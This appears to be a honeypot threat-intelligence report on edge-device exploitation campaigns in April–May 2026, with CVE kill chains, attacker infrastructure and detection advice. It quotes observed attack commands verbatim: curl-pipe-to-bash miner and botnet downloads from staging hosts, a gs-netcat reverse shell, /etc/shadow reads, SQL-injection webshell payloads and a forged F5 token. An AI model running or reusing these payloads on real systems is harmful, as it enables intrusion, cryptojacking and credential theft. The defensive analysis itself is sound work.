Edge Device Exploit Trends: Honeypot Analysis
Detection Chokepoint Framework
Every exploit in this dataset (Cisco SD-WAN, Citrix, SonicWall, Fortinet) follows the same chain. The CVE changes. The tooling changes. The five stages don't. Each badge maps to the ATT&CK technique you're detecting at that stage.
Authentication bypass, credential harvest, and webshell deployment: those three stages are where your detection budget compounds. Recon scanning generates volume but the attacker can change tools and IPs freely. Post-exploit behavior matters but varies by environment. The middle three are the invariants.
Monthly Volume: Daily Exploit Attempts
Daily hit volume across 22 decoy types. The spikes aren't gradual trends. They're specific campaigns lighting up.
Recon vs. Exploitation: The Early-Warning Window
Every alert in this window is one of two things: weaponized exploitation ("Vulnerability Exploited") or targeted recon — probing, vuln-checks, and exposure scans against a specific CVE. In the Apr 19 - May 19, 2026 window the split is 67% exploitation / 33% recon. Recon usually arrives first, so the gap between the two is a lead indicator: when probing for a CVE ramps, weaponization tends to follow.
Where Recon Preceded Exploitation
CVEs where probing was observed before the first weaponized hit. Lead times are lower bounds within the export window — a CVE already active at the window start shows no lead.
| CVE | First recon | First exploit | Lead | Exploit hits |
|---|---|---|---|---|
CVE-2025-55182 | 2026-04-19 | 2026-04-25 | 6d | 30 |
CVE-2023-46747 | 2026-04-22 | 2026-04-26 | 4d | 113 |
CVE-2025-4427 | 2026-04-27 | 2026-04-29 | 2d | 24 |
Target Distribution: What Adversaries Are Hunting
Combined across both observation windows. Citrix still dominates at 47% of all traffic, but the composition has shifted: React Server (CVE-2025-55182) and cPanel/WHM (CVE-2026-41940) are brand-new targets that didn't appear in the first window at all. FortiWeb doubled. SD-WAN and SAP burned hot then cooled - classic burst-campaign behavior.
CVE-2026-20127: Full Kill Chain in Honeypot Data
CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN. Disclosed Feb 25, 2026. CISA KEV with 24-hour remediation. We captured the full attack chain: 137 IPs progressing from recon through auth bypass, webshell upload, and cryptominer deployment.
Attack Chain Stages: Observed in Honeypot
| Stage | Alert | Hits | Unique IPs | Key Artifact |
|---|---|---|---|---|
| RECON | Associated with CVE-2026-20127 | 2,475 | 189 | cmd.jsp probe, .dca credential read |
| AUTH | CVE-2026-20127 [First Part] | 664 | 123 | POST /jts/authenticated/j_security_check |
| UPLOAD | CVE-2026-20127 [Upload] | 111 | 44 | Path traversal → .war webshell deploy |
| EXEC | Webshell command execution | 1,780 | - | POST /cmd.gz/cmd.jsp |
Auth Bypass: Hardcoded DCA Credentials
The "First Part" stage sends authentication requests using the viptela-reserved-dca service account, a default internal account used by the Data Collection Agent.
Webshell Upload: Path Traversal to Wildfly
Post-authentication, attackers exploit the /dataservice/smartLicensing/uploadAck endpoint to upload .war files via path traversal into the Wildfly deployment directory.
Webshell Commands: Post-Exploit Activity
Once the webshell is deployed at /cmd.gz/cmd.jsp, attackers execute commands through POST requests. The command breakdown reveals a clear operational progression: enumeration → miner deployment → persistence.
| Count | Command | Purpose |
|---|---|---|
| 819 | id | User context check |
| 372 | curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bash | MINER Custom kernel payload |
| 196 | whoami | User context check |
| 37 | curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bash | MINER XMRig via MoneroOcean |
| 15 | curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bash | BOTNET Unknown payload |
| 10 | curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bash | BOTNET Compromised WP staging |
| 6 | uname -a;cat /etc/shadow;cat /etc/passwd;ifconfig -a;... | RECON Full system enumeration |
| 5 | gs-netcat_linux-x86_64 -s kikdddsdsrrds -l -i | C2 Global Socket reverse shell |
id commands, 372 XMRig deployments: noisy, opportunistic, easy to catch. But 6 IPs ran full system enumeration and 5 deployed gs-netcat reverse shells. Those are the ones that matter.
Credential Harvesting: DCA Config Files
739 requests targeted the .dca (Data Collection Agent) configuration file. This file contains credentials used by the DCA service to authenticate to vManage. Harvesting this file gives attackers legitimate credentials for lateral movement within the SD-WAN fabric.
CVE-2025-5777: CitrixBleed 2 (T1190 Pre-Auth Memory Disclosure)
Same vulnerability class as the original CitrixBleed that hit Boeing and ICBC. Pre-auth memory disclosure, ~127 bytes per request, session tokens leak out. The exploit is trivial: a 5-byte POST body with the word login. This window: 8,112 hits, 54% of all traffic, still growing.
Exploitation Pattern
All 8,112 hits target a single endpoint: POST /p/u/doAuthentication.do with a malformed login parameter (no equals sign or value). 97% of traffic uses an identical truncated User-Agent string, indicating a shared exploit toolkit spreading to new operators.
163[.]245[.]210[.]213 leads at 2,136 hits across this window, grinding continuously. 91[.]92[.]243[.]126 (1,558) and 91[.]92[.]243[.]11 (1,129) are in the same /24 running in parallel. 69[.]169[.]107[.]93 (691), 64[.]20[.]48[.]21 (502), and 178[.]16[.]55[.]226 (452) all appeared in the Apr 2–6 burst. Apr 6 (1,726 CitrixBleed 2 hits) is the new single-day peak. This isn't one campaign. It's a toolkit that anyone can pick up.
CitrixBleed 2 Daily Exploitation Trend
CVE-2022-22536 + CVE-2025-31324: SAP Surge (Apr 9–11)
SAP jumped from a footnote to the third most targeted platform in this window. 1,179 total hits on SAP Netweaver decoys, driven by a concentrated 72-hour burst Apr 9–11 on CVE-2022-22536, a 2022 CVSS 10.0 memory corruption / request smuggling vulnerability in SAP ICM. An additional 155 hits targeted CVE-2025-31324, the critical SAP NetWeaver Visual Composer RCE disclosed in 2025.
CVE-2022-22536: 4-Year-Old CVSS 10.0 Still Under Active Exploitation
The Apr 9–11 burst hit 176 unique IPs in three days: concentrated scanning across a wide source range rather than a single operator. CVE-2022-22536 allows unauthenticated HTTP request smuggling against SAP ICM, enabling memory disclosure and session token theft without credentials. Patched in 2022. Still getting 1,024 hits in a 31-day window in 2026.
| Date | Hits | CVE | Notes |
|---|---|---|---|
| Apr 9 | 337 | CVE-2022-22536 | Burst begins. 176 unique IPs |
| Apr 10 | 621 | CVE-2022-22536 | Peak day. Scanning at scale |
| Apr 11 | 66 | CVE-2022-22536 | Tail-off |
| Various | 155 | CVE-2025-31324 | SAP NetWeaver Visual Composer RCE |
CVE-2025-40599: SonicWall SMA Path Traversal + Self-Replicating Worm
478 attempts across 284 unique IPs targeting SonicWall SMA decoys via double-encoded path traversal to reach /bin/sh. Every request uses the libredtail-http User-Agent, a custom HTTP client not seen in any other campaign. 284 unique IPs is the most distributed attacker base of any campaign in this dataset.
apache.selfrep: this payload spreads itself. The script takes apache.selfrep as an argument, with self-replication logic baked into the payload. The same staging IP (31[.]57[.]216[.]121) appears in both the SonicWall path traversal and the "Shell eval!" alerts across Ivanti, Citrix, and FortiClient EMS decoys, confirming a single worm operator targeting multiple edge device families simultaneously. All 30 shell eval hits still point to this same IP. The worm infrastructure remains active for the entire 31-day observation period.
CVE-2025-25257: FortiWeb Multi-Stage SQLi via Bearer Token
237 requests targeting FortiWeb's /api/fabric/device/status endpoint. Attackers embed SQL injection payloads inside the Authorization: Bearer header, an unusual injection point that bypasses WAF rules typically inspecting query parameters and POST bodies.
CVE-2026-21643: FortiClient EMS SQLi, New Operator Fingerprint (Apr 2)
FortiClient EMS SQLi jumped from 159 to 187 hits (+28 on Apr 2). A new operator fingerprint emerged: payloads containing alireza_cve_2026_21643_test appeared alongside the existing nuclei_cve_2026_21643_test pattern.
Attack Progression
| Step | Payload (in Bearer token) | Purpose |
|---|---|---|
| 1 | bitsight-internet-census' or 'x'='x | Auth bypass / boolean blind SQLi test |
| 2 | SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py' | Write webshell via SQL INTO OUTFILE |
| 3-6 | UPDATE a SET a=(SELECT CONCAT(a, 0x...)) | Staged hex payload assembly into DB field |
Authorization header gets passed through uninspected. The webshell lands in /var/log/lib/python3.10/pylab.py, a Python library path that won't trigger file integrity monitoring. If you're not inspecting auth headers for SQL metacharacters, you're missing this entire class.
CVE-2026-1281 / CVE-2026-1340: Ivanti EPMM Reverse Shell (Apr 3)
5 requests on Apr 3 targeting Ivanti EPMM via the /mifs/c/appstore/fob/ endpoint. The payload embeds a bash reverse shell directly in the URL path using backtick command injection inside the sha256 hash parameter.
1337 repeating in the GUID and epoch. This is someone running a proof of concept. The actionable IOC is 5[.]255[.]120[.]46:5555. Any outbound connection from an EPMM host to that address is confirmed compromise.
CVE-2019-19781: 6-Year-Old Citrix Vuln Still Getting Probed (Apr 3)
2 hits probing for CVE-2019-19781, a path traversal in Citrix ADC first disclosed December 2019. This CVE is 6+ years old and still being actively probed, reinforcing that edge device vulnerabilities have extremely long exploitation tails.
CVE-2025-64446: FortiWeb API Path Traversal (Apr 2 Spike)
FortiWeb path traversal exploitation jumped to 63 hits, with 22 new attempts on Apr 2 from two IPs in the same 101[.]71[.]38[.]0/24 netblock. The exploit abuses URL-encoded %3f (question mark) in the API path to traverse to /cgi-bin/fwbcgi.
CVE-2026-41940: cPanel WHM Authentication Bypass (3-Stage Chain)
1,515 hits on cPanel/WHM decoys across a 3-stage exploitation chain. Stage 1 mints a session token via an intentionally wrong password - the bug causes the server to issue a valid session cookie despite authentication failure. Stage 2 uses that minted session to call /json-api/listaccts, harvesting all hosted account credentials. Stage 3 uses the cache propagation gadget at /scripts2/listaccts to persist access across session expiry. 164 unique IPs hit Stage 1; only 13 progressed to Stage 2, confirming most operators are scanning rather than doing full account takeover.
| Stage | Alert | Hits | Unique IPs | Key Artifact |
|---|---|---|---|---|
| AUTH | CVE-2026-41940 – Preauth Session Mint | 1,223 | 164 | POST /login/?login_only=1 with wrong credentials via Go-http-client |
| HARVEST | CVE-2026-41940 – Authenticated json-api Call | 189 | 13 | GET /cpsess.../json-api/listaccts with minted session cookie |
| PERSIST | CVE-2026-41940 – Cache Propagation Gadget | 103 | 16 | GET /scripts2/listaccts or /cpsess.../scripts2/listaccts |
/login/?login_only=1 returning a session token despite a failed password is the invariant. Legitimate WHM logins don't use login_only=1 with intentionally wrong credentials. Any external IP hitting this endpoint is malicious. Log WHM auth endpoints to your SIEM and alert on login_only=1 from non-management IP ranges.
CVE-2025-55182: Next.js Server Actions RCE
2,653 hits on React Server decoys from 292 unique IPs - the most distributed new campaign in this window. The exploit sends a POST / with a Next-Action header and a multipart body to trigger unauthenticated remote code execution in Next.js Server Actions. 97% of requests use Go-http-client/1.1, making User-Agent matching a near-reliable detection layer while it lasts. The extreme distribution (292 IPs for 2,653 hits) suggests a public PoC driving broad opportunistic scanning rather than a single operator campaign.
POST / with Next-Action header from an external IP, Content-Type: multipart/form-data, User-Agent: Go-http-client. Near-zero false positive rate on that combination. Patch first; detect second.
CVE-2022-1388: F5 iControl REST Auth Bypass Resurfaces
314 hits across 10 unique IPs targeting F5 Big-IP decoys via the 2022 iControl REST authentication bypass. All requests use a static forged X-F5-Auth-Token header (ea5641ae55012ddb91da9978663575) and hit /mgmt/tm/util/bash to probe for command execution access. This CVE is 3 years old; the static token is a shared PoC artifact, which means these 10 operators are running the same public exploit tool without modification.
X-F5-Auth-Token: ea5641ae55012ddb91da9978663575 is the shared PoC value. Any request to /mgmt/tm/util/bash from an external IP should alert regardless of the token. Any request with this specific token value is confirmed exploit tooling.
Attacker Tooling: Scanner & Automation Fingerprints
38.7% of traffic self-identifies via User-Agent. That's the floor. The other 61% spoof browser UAs but behave like bots.
python-requests dominates at 78% of scanner-attributed traffic. libredtail-http is exclusively associated with the SonicWall worm campaign.
Multi-Device Operators: IPs Scanning Across Decoy Types
| IP | Hits | Products Targeted | Significance | |
|---|---|---|---|---|
47[.]253[.]5[.]130 | 13 | Cisco SD-WAN, Citrix, FortiClient, Ivanti, SonicWall | MULTI-EXPLOIT Broadest coverage | |
ASNAS45102 Alibaba (US) Technology Co., Ltd.
Country / CityHong Kong · Hong Kong
HostingUnknown
StatusActive
| ||||
144[.]31[.]4[.]70 | 53 | Citrix, FortiGate, FortiWeb, Palo Alto, SolarWinds | MULTI-EXPLOIT Fortinet-heavy | |
ASNAS215730 H2NEXUS LTD
Country / CityPoland · Warsaw
HostingUnknown
StatusActive
| ||||
82[.]165[.]66[.]87 | 23 | Citrix, FortiClient, Ivanti, SonicWall | MULTI-EXPLOIT Shell eval across all | |
ASNAS6724 STRATO AG
Country / CityGermany · Berlin
HostingUnknown
StatusActive
| ||||
103[.]98[.]152[.]233 | 327 | Cisco SD-WAN (primary) | MINER OPS kernel.sh staging host | |
ASNAS131374 HQG Technology Solutions Joint Stock Company
Country / CityVietnam · Ho Chi Minh City
HostingBulletproof Vietnamese VPS; same host as staging entry ep-st-1
StatusActive
| ||||
176[.]65[.]139[.]31 | 336 | Cisco SD-WAN (primary) | MINER OPS Full chain: auth→upload→mine | |
ASNAS214472 Offshore LC
Country / CityThe Netherlands · Kerkrade
HostingBulletproof Offshore-branded Dutch VPS; full kill chain operator
StatusActive
| ||||
Staging Infrastructure
Payload staging URLs extracted from webshell commands and shell eval payloads.
| URL / IP | Payloads | Type | Blind Spot | |
|---|---|---|---|---|
103[.]98[.]152[.]233/wp_plugins/kernel.sh | 386 | MINER | Path mimics WordPress plugin directory | |
ASNAS131374 HQG Technology Solutions Joint Stock Company
Country / CityVietnam · Ho Chi Minh City
HostingBulletproof Vietnamese VPS, primary cryptominer staging host
StatusActive
| ||||
31[.]57[.]216[.]121/sh | 687+ | WORM | Self-replicating apache.selfrep payload |
|
ASNAS197769 VPS Dedicated LLC
Country / CitySlovenia · Ljubljana
HostingBulletproof Abuse-tolerant VPS, no takedown response in 31-day observation window
StatusActive
| ||||
raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | 37 | MINER | Legitimate GitHub hosting. Cannot block domain | |
ASNAS54113 Fastly, Inc.
Country / CityUnited States · San Francisco
HostingCDN GitHub / Fastly CDN. Cannot block by IP or domain.
StatusActive
| ||||
83[.]142[.]209[.]47 | 25 | BOTNET | Serves nullnet_bash.sh. Botnet enrollment |
|
ASNAS205759 Ghosty Networks LLC
Country / CityLuxembourg · Luxembourg
HostingBulletproof Abuse-tolerant Luxembourg VPS, serves
nullnet_bash.sh botnet payloadStatusActive
| ||||
miso88[.]tech/wp-config/x | 10 | BOTNET | Compromised domain, WP config path | |
ASNAS13335 Cloudflare, Inc.
Country / CityUnited States · San Francisco (Cloudflare proxy - origin hidden)
HostingCompromised Legitimate site abused as staging host; origin IP masked by Cloudflare
StatusUnknown
| ||||
213[.]139[.]77[.]117:4433 | 10 | C2 CHECK | Port 4433 callback. Connectivity test before C2 | |
ASNAS398256 Ultahost, Inc.
Country / CityUnited States · New York City
HostingBulletproof Abuse-tolerant VPS; port 4433 C2 callback
StatusActive
| ||||
5[.]255[.]120[.]46:5555 | 5 | REVERSE SHELL | Ivanti EPMM bash reverse shell target (Apr 3) | |
ASNAS60404 The Infrastructure Group B.V.
Country / CityThe Netherlands · Dronten
HostingBulletproof Abuse-tolerant Dutch VPS; reverse shell listener on port 5555
StatusActive
| ||||
raw.githubusercontent.com and piping to bash is anomalous regardless of the domain reputation.
Hosting Provenance: Where the Traffic Originates
Every attacker IP resolved to its hosting ASN (Team Cymru, cross-checked against IPinfo). This is where the exploit traffic is hosted — and watching the mix shift month over month is how abuse-tolerant / bulletproof rotation surfaces. 1029 cumulative unique source IPs across Apr 2026 - May 2026.
| Hosting / ASN org | ASN | Events | Class |
|---|---|---|---|
| H2NEXUS LTD | AS215730 | 3,110 | |
| Amazon.com, Inc. | AS16509 | 1,049 | |
| No.31,Jin-rong Street | AS4134 | 883 | |
| DigitalOcean, LLC | AS14061 | 498 | |
| Hurricane Electric LLC | AS6939 | 452 | |
| The Constant Company, LLC | AS20473 | 357 | |
| TechTies Inc. | AS197170 | 334 | |
| VPSVAULT.HOST LTD | AS215925 | 253 | |
| Tianfeng (Hong Kong) Communi | AS213802 | 245 | |
| PacketHub S.A. | AS147049 | 209 |
Detection Recommendations
Each detection maps to the technique it catches. The ones that survived every CVE rotation in this dataset are at the top.
viptela-reserved-dca or any viptela-reserved-* account from external IPs. These are internal service accounts. External auth requests are always malicious.Observed payloads (1)
Example detection logic
/var/lib/wildfly/standalone/deployments/.Observed payloads (1)
Example detection logic
POST /p/u/doAuthentication.do with a body containing only login (no equals sign, no value). Legitimate authentication always includes login=username. Near-zero false positive potential.Observed payloads (1)
Example detection logic
Bearer tokens, a common WAF bypass. Inspect Authorization headers for SQL metacharacters.Observed payloads (3)
Example detection logic
wget|curl ... | sh chains. Monitor for outbound HTTP(S) from edge device management IPs followed by shell execution.Observed payloads (5)
Example detection logic
.dca config file path. Access to this file from any non-management IP indicates credential harvesting, the lateral movement enabler.